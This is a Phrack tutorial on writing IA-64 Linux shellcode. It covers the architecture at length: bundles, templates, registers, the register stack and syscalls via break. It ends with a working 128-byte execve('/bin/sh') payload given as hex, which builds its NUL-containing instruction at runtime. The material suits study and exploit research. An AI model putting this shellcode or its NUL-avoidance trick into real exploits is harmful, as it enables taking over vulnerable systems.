==Phrack Inc.==

 

Volume 0x0b, Issue 0x39, Phile #0x05 of 0x12

 

|=-------------------=[ WRITING SHELLCODE FOR IA-64 ]=-------------------=|

|=-----------=[ or: 'how to turn diamonds into jelly beans' ]------------=|

|=--------------------=[ papasutra of haquebright ]=---------------------=|

 

 

- Intro

- Big Picture

- Architecture

- EPIC

- Instructions

- Bundles

- Instruction Types and Templates

- Registers

- Register List

- Register Stack Engine

- Dependency Conflicts

- Alignment and Endianness

- Memory Protection

- Privilege Levels

- Coding

- GCC IA-64 Assembly Language

- Useful Instruction List

- Optimization

- Coding Aspects

- Example Code

- References

- Greetings

 

 

--> Intro

 

This paper outlines the techniques you need and the things I've

learned about writing shellcode for the IA-64. Although the IA-64 is

capable of executing IA-32 code, this is not the topic of this paper.

Example code is for Linux, but most of this applies to all operating

systems that run on IA-64.

 

 

--> Big Picture

 

IA-64 is the successor to IA-32, formerly called the i386

architecture, which is implemented in all those PC chips like Pentium

and Athlon and so on.

It has been developed by Intel and HP since 1994, and is available in the

Itanium chip. IA-64 will probably become the main architecture for the

Unix workstations of HP and SGI, and for Microsoft Windows. It is a 64

bit architecture, and is as such capable of doing 64 bit integer

arithmetic in hardware and addressing 2^64 bytes of memory. A very

interesting feature is the parallel execution of code, for which a

very special binary format is used.

So let's get a little more specific.

 

 

--> EPIC

 

On conventional architectures, parallel code execution is made

possible by the chip itself. The instructions read are analyzed,

reordered and grouped by the hardware at runtime, and therefore only

very conservative assumptions can be made.

EPIC stands for 'explicit parallel instruction computing'. It works by

grouping the code into independent parts at compile time, that is, the

assembly code must already contain the dependency information.

 

 

--> Instructions

 

The instruction size is fixed at 41 bits. Each instruction is made up

of five fields:

 

+-----------+-----------+-----------+-----------+-----------+
| opcode    | operand 1 | operand 2 | operand 3 | predicate |
+-----------+-----------+-----------+-----------+-----------+
| 40 to 27  | 26 to 20  | 19 to 13  | 12 to 6   | 5 to 0    |
+-----------+-----------+-----------+-----------+-----------+

 

The large opcode space of 14 bits is used for specializing

operations. For example, there are different branch instructions for

branches that are taken often and ones taken seldom. This extra

information is then used in the branch prediction unit.

 

There are three operand fields usable for immediate values or register

numbers. Some instructions combine all three operand fields to a

single 21 bit immediate value field. It is also possible to append a

complete 41 bit instruction slot to another one to form a 64 bit

immediate value field.

 

The last field references a so called predicate register by a 6 bit

number. Predicate registers each contain a single bit to represent the

boolean values 'true' and 'false'. If the value is 'false' at

execution time, the instruction is discarded just before it takes

effect. Note that some instructions cannot be predicated.

 

If a certain operation does not need a certain field in the scheme

above, it is set to zero by the assembler. I tried to fill in other

values, and it still worked. But this may not be the case for every

instruction and every implementation of the IA-64 architecture. So be

careful about this...

Also note that there are some shortcut instructions such as mov, which

in reality is just an add operation with register 0 (constant 0) as the

other argument.
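
To make the field layout concrete, here is a minimal C sketch that cuts
a 41 bit slot into the five fields of the table above. It follows the
simplified scheme of this paper only; real encodings reuse the operand
bits differently per instruction, so check [3] before relying on it.
The names slot_fields and split_slot are made up for this example.

```c
#include <stdint.h>

/* The five fields of one 41 bit instruction slot, following the
 * simplified table above. Real encodings differ per instruction. */
struct slot_fields {
    unsigned opcode;    /* bits 40..27 */
    unsigned operand1;  /* bits 26..20 */
    unsigned operand2;  /* bits 19..13 */
    unsigned operand3;  /* bits 12..6  */
    unsigned predicate; /* bits  5..0  */
};

/* split_slot() is a hypothetical helper, not part of any toolchain.
 * The slot is expected in the low 41 bits of the argument. */
struct slot_fields split_slot(uint64_t slot)
{
    struct slot_fields f;

    f.opcode    = (unsigned)((slot >> 27) & 0x3fff);
    f.operand1  = (unsigned)((slot >> 20) & 0x7f);
    f.operand2  = (unsigned)((slot >> 13) & 0x7f);
    f.operand3  = (unsigned)((slot >> 6) & 0x7f);
    f.predicate = (unsigned)(slot & 0x3f);
    return f;
}
```

For instance, split_slot(slot).predicate gives the number of the
predicate register that guards the instruction.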

 

 

--> Bundles

 

In the compiled code, instructions are grouped together into 'bundles'

of three. Included in every bundle is a five bit template field that

specifies which hardware units are needed for the execution.

So what it boils down to is a bundle length of 128 bits. Nice, eh?

 

+-----------+----------+---------+----------+
| instr 3   | instr 2  | instr 1 | template |
|-----------+----------+---------+----------|
| 127 to 87 | 86 to 46 | 45 to 5 | 4 to 0   |
+-----------+----------+---------+----------+
(instr 1, the first in program order, sits directly above the template.)

 

Templates are used to dispatch the instructions to the different

hardware units. This is quite straightforward: the dispatcher just has

to switch over the template bits.

 

Templates can also encode a so-called 'stop' after instruction slots.

Stops are used to break parallel instruction execution, and you will

need them to solve Data Flow Dependencies (see below). You can put a

stop after every complete bundle, but if you need to save space, it is

often better to stop after an instruction in the middle of a bundle.

This does not work for every template, so you need to check the

template table below for this.

 

The independent code regions between stops are called instruction

groups. Making use of the parallel semantics they carry, the Itanium

for example is capable of executing up to two bundles at once, if

there are enough execution units for the set of instructions specified

in the templates. Later implementations will most likely raise this

number.
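
Taking a bundle apart is plain bit shuffling. The sketch below assumes
the bundle is held as two 64 bit words, low word first (the way the
example code at the end of this paper stores it), and that the first
instruction (slot 0) occupies bits 45 to 5 as documented in [3].
struct bundle and unpack_bundle are hypothetical names.

```c
#include <stdint.h>

#define SLOT_MASK ((UINT64_C(1) << 41) - 1)

struct bundle {
    unsigned template_id;  /* bits 4..0 */
    uint64_t slot[3];      /* slot[0]: bits 45..5, slot[1]: 86..46,
                              slot[2]: 127..87 */
};

/* lo holds bits 63..0 of the bundle, hi holds bits 127..64. */
struct bundle unpack_bundle(uint64_t lo, uint64_t hi)
{
    struct bundle b;

    b.template_id = (unsigned)(lo & 0x1f);
    b.slot[0] = (lo >> 5) & SLOT_MASK;
    /* slot 1 straddles both words: 18 bits from lo, 23 bits from hi */
    b.slot[1] = ((lo >> 46) | (hi << 18)) & SLOT_MASK;
    b.slot[2] = (hi >> 23) & SLOT_MASK;
    return b;
}
```

Fed with the last bundle of the example shellcode, the template comes
out as 0x11 and the low six bits of slot 2 as 2, which is the p2
predicate of the final branch.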

 

 

--> Instruction Types and Templates

 

There are different instruction types, grouped by the hardware unit

they need. Only certain combinations are allowed in a single bundle.

Instruction types are A (ALU Integer), I (Non-ALU Integer), M

(Memory), F (Floating Point), B (Branch) and L+X (Extended). The X

slots may also contain break.i and nop.i for compatibility reasons.

 

In the following template list, '|' is a stop:

 

00 M I I

01 M I I|

02 M I|I <- in-bundle stop

03 M I|I| <- in-bundle stop

04 M L X

05 M L X|

06 reserved

07 reserved

08 M M I

09 M M I|

0a M|M I <- in-bundle stop

0b M|M I| <- in-bundle stop

0c M F I

0d M F I|

0e M M F

0f M M F|

10 M I B

11 M I B|

12 M B B

13 M B B|

14 reserved

15 reserved

16 B B B

17 B B B|

18 M M B

19 M M B|

1a reserved

1b reserved

1c M F B

1d M F B|

1e reserved

1f reserved
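
The list above translates directly into a lookup table, which is handy
when you want to check by hand which template the assembler picked for
a bundle. This is only a sketch; template_names, template_name and
template_ends_with_stop are names invented for it.

```c
#include <stddef.h>
#include <string.h>

/* One entry per 5 bit template value, NULL for reserved templates.
 * '|' marks a stop, exactly as in the list above. */
static const char *const template_names[32] = {
    "MII", "MII|", "MI|I", "MI|I|", "MLX", "MLX|", NULL,  NULL,
    "MMI", "MMI|", "M|MI", "M|MI|", "MFI", "MFI|", "MMF", "MMF|",
    "MIB", "MIB|", "MBB",  "MBB|",  NULL,  NULL,   "BBB", "BBB|",
    "MMB", "MMB|", NULL,   NULL,    "MFB", "MFB|", NULL,  NULL,
};

/* Returns the slot types of a template, or NULL if it is reserved. */
const char *template_name(unsigned id)
{
    return id < 32 ? template_names[id] : NULL;
}

/* Returns 1 if the template puts a stop after the last slot. */
int template_ends_with_stop(unsigned id)
{
    const char *name = template_name(id);

    return name != NULL && name[strlen(name) - 1] == '|';
}
```

The template number itself is simply the low five bits of the first
byte of a bundle.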

 

 

--> Registers

 

This is not a comprehensive list, check [1] if you need one.

 

IA-64 specifies 128 general (integer) registers (r0..r127). There are

128 floating point registers, too (f0..f127).

 

Predicate Registers (p0..p63) are used for optimizing runtime

decisions. For example, 'if' results can be handled without branches

by setting a predicate register to the result of the 'if', and using

that predicate for the conditional code. As outlined above, predicate

registers are referenced by a field in every instruction. If no

register is specified, p0 is filled in by the assembler. p0 is always

'true'.

 

Branch Registers (b0..b7) are used for indirect branches and

calling. Branch instructions can only handle branch registers. When

calling a function, the return address is stored in b0 by

convention. It is saved to local registers by the called function if

it needs to call other functions itself.

 

There are the special registers Loop Count (LC) and Epilogue Count

(EC). Their use is explained in the optimization chapter.

 

The Current Frame Marker (CFM) holds the state of the register

rotation. It is not accessible directly. The Instruction Pointer (IP)

contains the address of the bundle that is currently executed.

 

The User Mask (UM):

+-------+-------------------------------------------------------------+
| flag  | purpose                                                     |
+-------+-------------------------------------------------------------+
| UM.be | set this to 1 for big endian data access                    |
| UM.ac | if this is 0, Unaligned Memory Faults are raised only if    |
|       | the situation cannot be handled by the processor at all     |
+-------+-------------------------------------------------------------+

The User Mask can be modified from any privilege level (see below).

 

Some interesting Processor Status Register (PSR) fields:
+---------+-----------------------------------------------------------+
| flag    | purpose                                                   |
+---------+-----------------------------------------------------------+
| PSR.pk  | if this is 0, protection key checks are disabled          |
| PSR.dt  | if this is 0, physical addressing is used for data        |
|         | access; access rights are not checked.                    |
| PSR.it  | if this is 0, physical addressing is used for instruction |
|         | access; access rights are not checked.                    |
| PSR.rt  | if this is 0, the register stack translation is disabled  |
| PSR.cpl | this is the current privilege level. See its chapter for  |
|         | details.                                                  |
+---------+-----------------------------------------------------------+

All but the last of these fields can only be modified from privilege

level 0 (see below).

 

 

--> Register List

 

+---------+------------------------------+
| symbol  | Usage Convention             |
+---------+------------------------------+
| b0      | Call Register                |
| b1-b5   | Must be preserved            |
| b6-b7   | Scratch                      |
| r0      | Constant Zero                |
| r1      | Global Data Pointer          |
| r2-r3   | Scratch                      |
| r4-r7   | Must be preserved            |
| r8-r11  | Procedure Return Values      |
| r12     | Stack Pointer                |
| r13     | (Reserved as) Thread Pointer |
| r14-r31 | Scratch                      |
| r32-rxx | Argument Registers           |
| f2-f5   | Preserved                    |
| f6-f7   | Scratch                      |
| f8-f15  | Argument/Return Registers    |
| f16-f31 | Must be preserved            |
+---------+------------------------------+
Additionally, LC must be preserved.

 

 

--> Register Stack Engine

 

IA-64 provides you with a register stack. There is a register frame,

consisting of input (in), local (loc), and output (out) registers. To

allocate a stack frame, use the 'alloc' instruction (see [1]). When a

function is called, the stack frame is shifted, so that the former

output registers become the new input registers. Note that you need to

allocate a stack frame even if you only want to access the input

registers.

 

Unlike on SPARC, there are no 'save' and 'restore' instructions needed

in this scheme. Also, the (memory) stack is not used to pass arguments

to functions.

 

The Register Stack Engine also provides you with register

rotation. This makes modulo-scheduling possible, see the optimization

chapter for this. The 'alloc' described above specifies how many

general registers rotate, the rotating region always begins at r32,

and overlaps the local and output registers. Also, the predicate

registers p16 to p63 and the floating point registers f32 to f127

rotate.
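
The renaming done on a call can be modelled with a few lines of C. This
sketch assumes that the stacked registers start at r32 and that the
callee's frame begins at the caller's first output register. struct
frame and both helper names are invented here, and rotation is left
out.

```c
/* Sizes as given to: alloc rX = ar.pfs, inputs, locals, outputs, rot */
struct frame {
    unsigned inputs;
    unsigned locals;
    unsigned outputs;
};

/* Number of the first output register of a frame. */
unsigned first_output_reg(struct frame f)
{
    return 32 + f.inputs + f.locals;
}

/* The callee sees the caller's n-th output register as r32+n.
 * Returns the caller's number for that register, or 0 if the caller
 * has no such output register. */
unsigned caller_reg_for_callee_input(struct frame caller, unsigned n)
{
    if (n >= caller.outputs)
        return 0;
    return first_output_reg(caller) + n;
}
```

With the frame used in the example code (0 inputs, 3 locals, 3
outputs), the output registers are r35 to r37.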

 

 

--> Dependency Conflicts

 

Dependency conflicts are formally classified into three categories:

 

- Control Flow Conflicts

 

These occur when assumptions are made about whether a branch is taken.

For example, the code following a branch instruction must be discarded

when it is taken. On IA-64, this happens automatically. But if the

code is optimized using control speculation (see [1]), control flow

conflicts must be resolved manually. Hardware support is provided.

 

- Memory Conflicts

 

The reason for memory conflicts is the higher latency of memory

accesses compared to register accesses. Memory accesses can therefore

stall execution. IA-64 introduces data speculation (see

[1]) to be able to move loads to be executed as early as possible in

the code.

 

- Data Flow Conflicts

These occur when there are instructions that share registers or memory

fields in a block marked for parallel execution. This leads to

undefined behavior and must be prevented by the coder. This is the

type of conflict that will bother you the most, especially when trying

to write compact code!
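
A rough way to check an instruction group for data flow conflicts is
sketched below. It is a deliberate simplification: only general
registers are tracked, only a write followed by a read or another write
of the same register is flagged, and the special cases the architecture
permits (see [1]) are ignored. struct insn and find_group_conflict are
made-up names.

```c
#include <stddef.h>

/* One instruction, reduced to the general registers it touches.
 * Use -1 for an unused field. */
struct insn {
    int dst;
    int src1;
    int src2;
};

/* Returns the index of the first instruction that reads or writes a
 * register written earlier in the same group, or -1 if there is none.
 * A stop (';;') has to go somewhere before the returned index. */
int find_group_conflict(const struct insn *group, size_t n)
{
    for (size_t i = 1; i < n; i++) {
        for (size_t j = 0; j < i; j++) {
            int written = group[j].dst;

            if (written < 0)
                continue;
            if (written == group[i].src1 || written == group[i].src2 ||
                written == group[i].dst)
                return (int)i;
        }
    }
    return -1;
}
```

For example, 'or r22 = 0x08, r37' followed by 'dep r15 = r22, r15, 56,
8' in the same group is reported, which is why the example code puts a
stop between the two.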

 

 

--> Alignment and Endianness

 

As on many other architectures, you have to align your data and

code. On IA-64, code must be aligned on 16 byte boundaries, and is

stored in little endian byte order. Data fields should be aligned

according to their size, so an 8 bit char should be aligned on 1 byte

boundaries. There is a special rule for 10 byte floating point numbers

(should you ever need them): you have to align them on 16 byte

boundaries. Data endianness is controlled by the UM.be bit in the user

mask ('be' means big endian enable). On IA-64 Linux, little endian is

default.
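
Both rules are easy to express in C. The following sketch rounds an
address down to a power-of-two boundary and reads eight bytes as a
little endian value regardless of the byte order of the machine it runs
on. align_down and load_le64 are hypothetical helper names.

```c
#include <stdint.h>

/* Round addr down to a boundary that must be a power of two,
 * for example 16 for a code bundle. */
uint64_t align_down(uint64_t addr, uint64_t boundary)
{
    return addr & ~(boundary - 1);
}

/* Read 8 bytes as a little endian 64 bit value, independent of the
 * byte order of the host. */
uint64_t load_le64(const unsigned char *p)
{
    uint64_t v = 0;

    for (int i = 0; i < 8; i++)
        v |= (uint64_t)p[i] << (8 * i);
    return v;
}
```

Reading the eight bytes of the C string "/bin/sh" (terminator included)
this way gives 0x0068732f6e69622f, which is the string constant of the
example code once its top byte has been cleared.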

 

 

--> Memory Protection

 

Memory is divided into several virtual pages. There is a set of

Protection Key Registers (PKR) that contain all keys required for a

process. The Operating System manages the PKR. Before memory access is

permitted, the key of the respective memory field (which is stored in

the Translation Lookaside Buffer) is compared to all the PKR keys. If

none matches, a Key Miss fault is raised. If there is a matching key,

it is checked for read, write and execution rights. Access

capabilities are calculated from the key's access rights field, the

privilege level of the memory page and the current privilege level

of the executing code (see [1] for details). If an operation is to be

performed which is not covered by the calculated capabilities, a Key

Permission Fault is generated.

 

 

--> Privilege Levels

 

There are four privilege levels numbered from 0..3, with 0 being the

most privileged one. System instructions and registers can only be

used from level 0. The current privilege level (CPL) is stored in

PSR.cpl. The following instructions change the CPL:

 

- enter privileged code (epc)

The epc instruction sets the CPL to the privilege level of the page

containing the epc instruction, if that level is more privileged

(numerically lower) than the CPL. The page must be execute only, and

the previous privilege level must not be more privileged than the CPL.

 

- break

'break' issues a Break Instruction Fault. Like every instruction fault

on IA-64, this sets the CPL to 0. The immediate value stored in the

break encoding is handed to the fault handler, which uses it to pick

the service to run.

 

- branch return

This resets the CPL to its previous value.

 

 

--> GCC IA-64 Assembly Language

 

As you should have figured out by now, assembly language is normally

not used to program a chip like this. The optimization techniques are

very difficult for a programmer to exploit by hand (although possible

of course). Assembly will always be used to call some processor ops

that programming languages do not support directly, for algorithm

coding, and for shellcode of course.

 

The syntax basically works like this:

(predicate_num) opcode_name operand_1 = operand_2, operand_3

Example:

(p1) fmpy f6 = f7, f8

 

As mentioned in the instruction format chapter, sometimes not all

operand fields are used, or operand fields are combined.

Additionally, there are some instructions which cannot be predicated.

 

Stops are encoded by appending ';;' to the last instruction of an

instruction group. Symbolic names are used to reference procedures, as

always.

 

 

--> Useful Instruction List

 

Although you will have to check [3] in any case, here are a few

instructions you may want to check first:

+--------+------------------------------------------------------------+
| name   | description                                                |
+--------+------------------------------------------------------------+
| dep    | deposit an 8 bit immediate value at an arbitrary position  |
|        | in a register                                              |
| dep    | deposit a portion of one reg into another                  |
| mov    | branch register to general register                        |
| mov    | max 22 bit immediate value to general register             |
| movl   | max 64 bit immediate value to general register             |
| adds   | add short                                                  |
| branch | indirect form, non-call                                    |
+--------+------------------------------------------------------------+
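
Since dep does most of the patching in the example code, here is a
small C model of its register form. It is a sketch of the semantics as
I read them from the example ('dep r1 = r2, r3, pos, len' copies r3 and
replaces len bits starting at bit pos with the low bits of r2); the
function name and argument order are my own.

```c
#include <stdint.h>

/* Model of: dep r1 = r2, r3, pos, len
 * Returns r3 with bits pos..pos+len-1 replaced by the low len bits
 * of r2. Expects pos < 64 and 1 <= len <= 64 - pos. */
uint64_t dep(uint64_t r2, uint64_t r3, unsigned pos, unsigned len)
{
    uint64_t field = (len >= 64) ? ~UINT64_C(0)
                                 : (UINT64_C(1) << len) - 1;
    uint64_t mask = field << pos;

    return (r3 & ~mask) | ((r2 << pos) & mask);
}
```

dep(0x08, 0x1094, 56, 8) followed by a second deposit of 0x42 at bit 16
yields 0x0800000000421094, the second half of the constructed bundle in
the example code.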

 

 

--> Optimization

 

There are some optimization techniques that become possible on

IA-64. However, because the topic of this paper is not how to write

fast code, they are not explained here. Check [5] for more information

about this, especially look into Modulo Scheduling. It allows you to

overlap multiple iterations of a loop, which leads to very compact

code.

 

 

--> Coding Aspects

 

Stack: As on IA-32, the stack grows to the lower memory

addresses. Only local variables are stored on the stack.

 

System calls: Although the epc instruction is meant to be used

instead, Linux on IA-64 uses Break Instruction Faults to do a system

call. According to [6], Linux will switch to epc some day, but this

has not yet happened. The break immediate used for issuing a system

call is 0x100000. As stated above, break takes this value only as an

immediate in its encoding, and the resulting bundle contains NUL bytes.

This introduces the need to construct the break instruction in the

shellcode at runtime. This is done in the example code below.
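
Whether a piece of code is free of NUL bytes is easy to check
mechanically. The sketch below scans an array of 64 bit words the way
the example code stores them; word_has_nul and first_nul_word are
made-up helper names.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if any of the eight bytes of w is zero. */
int word_has_nul(uint64_t w)
{
    for (int i = 0; i < 8; i++) {
        if (((w >> (8 * i)) & 0xff) == 0)
            return 1;
    }
    return 0;
}

/* Returns the index of the first word containing a zero byte,
 * or -1 if the whole array is NUL-free. */
long first_nul_word(const uint64_t *words, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (word_has_nul(words[i]))
            return (long)i;
    }
    return -1;
}
```

Run over the two words of the constructed bundle, it flags the second
one (0x0800000000421094), which is exactly the word the example code
has to patch together at runtime.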

 

Setting predicates: Do that by using the compare (cmp)

instructions. Predicates might also come in handy if you need to fill

some space with instructions, and want to cancel them out to form

NOPs.

 

Getting the hardware: Check [2] or [7] for experimenting with IA-64,

if you do not have one yourself.

 

 

--> Example Code

 

<++> ia64-linux-execve.c !f4ed8837

/*

* ia64-linux-execve.c

* 128 bytes.

*

*

* NOTES:

*

* the execve system call needs:

* - command string addr in r35

* - args addr in r36

* - env addr in r37

*

* as ia64 has fixed-length instructions (41 bits), there are a few

* instructions that have unused bits in their encoding.

* i used that at two points where i did not find nul-free equivalents.

* these are marked '+0x01', see below.

*

* it is possible to save at least one instruction by loading bundle[1]

* as a number (like bundle[0]), but that would be a less interesting

* solution.

*

*/

 

unsigned long shellcode[] = {

 

/* MLX

* alloc r34 = ar.pfs, 0, 3, 3, 0 // allocate vars for syscall

* movl r14 = 0x0168732f6e69622f // aka "/bin/sh",0x01

* ;; */

0x2f6e458006191005,

0x631132f1c0016873,

 

/* MLX

* xor r37 = r37, r37 // NULL

* movl r17 = 0x48f017994897c001 // bundle[0]

* ;; */

0x9948a00f4a952805,

0x6602e0122048f017,

 

/* MII

* adds r15 = 0x1094, r37 // unfinished bundle[1]

* or r22 = 0x08, r37 // part 1 of bundle[1]

* dep r12 = r37, r12, 0, 8 // align stack ptr

* ;; */

0x416021214a507801,

0x4fdc625180405c94,

 

/* MII

* adds r35 = -40, r12 // circling mem addr 1, shellstr addr

* adds r36 = -32, r12 // circling mem addr 2, args[0] addr

* dep r15 = r22, r15, 56, 8 // patch bundle[1] (part 1)

* ;; */

0x0240233f19611801,

0x41dc7961e0467e33,

 

/* MII

* st8 [r36] = r35, 16 // args[0] = shellstring addr

* adds r19 = -16, r12 // prepare branch addr: bundle[0] addr

* or r23 = 0x42, r37 // part 2 of bundle[1]

* ;; */

0x81301598488c8001,

0x80b92c22e0467e33,

 

/* MII

* st8 [r36] = r17, 8 // store bundle[0]

* dep r14 = r37, r14, 56, 8 // fix shellstring

* dep r15 = r23, r15, 16, 8 // patch bundle[1] (part 2)

* ;; */

0x28e0159848444001,

0x4bdc7971e020ee39,

 

/* MMI

* st8 [r35] = r14, 25 // store shellstring

* cmp.eq p2, p8 = r37, r37 // prepare predicate for final branch.

* mov b6 = r19 // (+0x01) setup branch reg

* ;; */

0x282015984638c801,

0x07010930c0701095,

 

/* MIB

* st8 [r36] = r15, -16 // store bundle[1]

* adds r35 = -25, r35 // correct string addr

* (p2) br.cond.spnt.few b6 // (+0x01) branch to constr. bundle

* ;; */

0x3a301799483f8011,

0x0180016001467e8f,

};

 

/*

* the constructed bundle

*

* MII

* st8 [r36] = r37, -8 // args[1] = NULL

* adds r15 = 1033, r37 // syscall number

* break.i 0x100000

* ;;

*

* encoding is:

* bundle[0] = 0x48f017994897c001

* bundle[1] = 0x0800000000421094

*/

<-->
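
If you want to convince yourself of the memory layout without an
Itanium at hand, the register and memory effects of the code above can
be replayed in portable C. This is only a model built from the comments
in the listing: SP is an arbitrary, hypothetical stack pointer value,
struct machine and replay are invented names, and nothing here executes
IA-64 code.

```c
#include <stdint.h>
#include <string.h>

#define SP UINT64_C(0x1000)   /* hypothetical stack pointer value */

struct machine {
    unsigned char mem[64];    /* models addresses SP-64 .. SP-1 */
    uint64_t r15, r35, r36, r37, b6;
};

/* st8/ld8: little endian 8 byte store and load into the model. */
static void st8(struct machine *m, uint64_t addr, uint64_t v)
{
    unsigned char *p = m->mem + (addr - (SP - 64));

    for (int i = 0; i < 8; i++)
        p[i] = (unsigned char)(v >> (8 * i));
}

uint64_t ld8(const struct machine *m, uint64_t addr)
{
    const unsigned char *p = m->mem + (addr - (SP - 64));
    uint64_t v = 0;

    for (int i = 0; i < 8; i++)
        v |= (uint64_t)p[i] << (8 * i);
    return v;
}

void replay(struct machine *m)
{
    uint64_t r12, r14, r15, r17, r19, r22, r23, r35, r36, r37;

    memset(m->mem, 0xaa, sizeof m->mem);  /* poison to expose stores */
    r14 = UINT64_C(0x0168732f6e69622f);   /* "/bin/sh",0x01 */
    r37 = 0;                              /* xor r37 = r37, r37 */
    r17 = UINT64_C(0x48f017994897c001);   /* bundle[0] */
    r15 = 0x1094 + r37;
    r22 = 0x08 | r37;
    r12 = SP & ~UINT64_C(0xff);           /* dep r12 = r37, r12, 0, 8 */
    r35 = r12 - 40;
    r36 = r12 - 32;
    r15 |= r22 << 56;     /* dep; the target bits are zero here */
    st8(m, r36, r35); r36 += 16;          /* args[0] */
    r19 = r12 - 16;
    r23 = 0x42 | r37;
    st8(m, r36, r17); r36 += 8;           /* bundle[0] */
    r14 &= ~(UINT64_C(0xff) << 56);       /* dep r14 = r37, r14, 56, 8 */
    r15 |= r23 << 16;     /* dep; the target bits are zero here */
    st8(m, r35, r14); r35 += 25;          /* shell string */
    st8(m, r36, r15); r36 -= 16;          /* bundle[1] */
    r35 -= 25;
    /* the constructed bundle, reached through b6 */
    st8(m, r36, r37); r36 -= 8;           /* args[1] = NULL */
    r15 = 1033 + r37;                     /* syscall number */

    m->r15 = r15; m->r35 = r35; m->r36 = r36; m->r37 = r37;
    m->b6 = r19;
}
```

After replay(), r35 points at the string, r36 at the two-entry argument
vector and r37 is zero, matching what the NOTES section says execve
expects.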

 

--> References

 

[1] HP IA-64 instruction set architecture guide

http://devresource.hp.com/devresource/Docs/Refs/IA64ISA/

[2] HP IA-64 Linux Simulator and Native User Environment

http://www.software.hp.com/products/LIA64/

[3] Intel IA-64 Manuals

http://developer.intel.com/design/ia-64/manuals/

[4] Sverre Jarp: IA-64 tutorial

http://cern.ch/sverre/IA64_1.pdf

[5] Sverre Jarp: IA-64 performance-oriented programming

http://sverre.home.cern.ch/sverre/IA-64_Programming.html

[6] A presentation about the Linux port to IA-64

http://linuxia64.org/logos/IA64linuxkernel.PDF

[7] Compaq Testdrive Program

http://www.testdrive.compaq.com

 

The register list is mostly copied from [4]

 

 

--> Greetings

 

palmers, skyper and scut of team teso

honx and homek of dudelab

 

|=[ EOF ]=---------------------------------------------------------------=|